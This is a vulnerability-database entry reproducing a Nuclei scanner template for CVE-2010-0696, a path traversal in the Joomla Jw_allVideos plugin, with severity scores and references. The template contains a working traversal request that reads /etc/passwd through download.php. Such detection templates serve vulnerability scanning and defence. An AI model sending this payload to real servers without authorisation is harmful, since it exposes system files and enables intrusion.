Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2010-0696
HistorySep 27, 2021 - 11:02 a.m.

Joomla! Component Jw_allVideos - Arbitrary File Retrieval

2021-09-2711:02:48
ProjectDiscovery
github.com
6
cve2010
joomla
lfi
joomlaworks
arbitrary file retrieval

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

AI Score

6.5

Confidence

Low

EPSS

0.426

Percentile

97.4%

A directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./…/…/ (modified dot dot) in the file parameter.

id: CVE-2010-0696

info:
  name: Joomla! Component Jw_allVideos - Arbitrary File Retrieval
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.
  impact: |
    An attacker can exploit this vulnerability to retrieve arbitrary files from the server.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/11447
    - https://nvd.nist.gov/vuln/detail/CVE-2010-0696
    - http://www.joomlaworks.gr/content/view/77/34/
    - http://www.exploit-db.com/exploits/11447
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2010-0696
    cwe-id: CWE-22
    epss-score: 0.57303
    epss-percentile: 0.97701
    cpe: cpe:2.3:a:joomlaworks:jw_allvideos:3.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: joomlaworks
    product: jw_allvideos
  tags: cve2010,cve,joomla,lfi,edb,joomlaworks

http:
  - method: GET
    path:
      - "{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220464645abae4d8bf812250b99a067483d22e89e09e5dafba7264b2d8d30900755022100c44339a7f47c1c7bdea6ba01152c037b2712977dab3d12e99aa1f9fa5d945493:922c64590222798bb761d5b6d8e72950

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

AI Score

6.5

Confidence

Low

EPSS

0.426

Percentile

97.4%